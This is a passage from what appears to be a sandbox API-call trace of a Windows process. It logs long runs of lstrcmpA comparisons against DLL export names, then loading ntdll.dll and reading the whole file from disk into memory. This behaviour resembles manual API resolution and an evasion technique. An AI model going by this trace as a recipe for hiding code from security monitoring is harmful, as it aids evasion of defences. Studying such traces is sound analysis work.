(lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0240.216] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0240.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0240.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0240.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0240.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0240.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0240.217] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0240.217] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0240.218] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0240.218] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0240.218] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0240.218] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0240.218] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0240.218] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0240.218] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0240.218] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0240.218] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0240.219] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0240.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0240.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0240.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0240.220] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0240.220] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0240.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0240.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0240.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0240.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0240.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0240.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0240.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0240.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0240.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0240.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0240.604] GetProcessHeap () returned 0x430000 [0240.604] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4054040 | out: hHeap=0x430000) returned 1 [0240.614] GetProcessHeap () returned 0x430000 [0240.614] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4497c0 [0240.614] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0240.614] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0240.614] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0240.614] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0240.615] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0240.616] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0240.616] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0240.616] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0240.616] GetProcessHeap () returned 0x430000 [0240.616] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1bba48) returned 0x4056040 [0240.622] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0240.622] ReadFile (in: hFile=0x140, lpBuffer=0x4056040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4056040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0240.891] CloseHandle (hObject=0x140) returned 1 [0240.891] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0240.891] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0240.891] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0240.891] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0240.891] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0240.892] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0240.892] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0240.892] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0240.892] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0240.892] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0240.892] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0240.892] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0240.892] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0240.892] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.892] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0240.892] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0240.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0240.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0240.893] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0240.893] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0240.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0240.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0240.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0240.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0240.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0240.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0240.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0240.896] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", 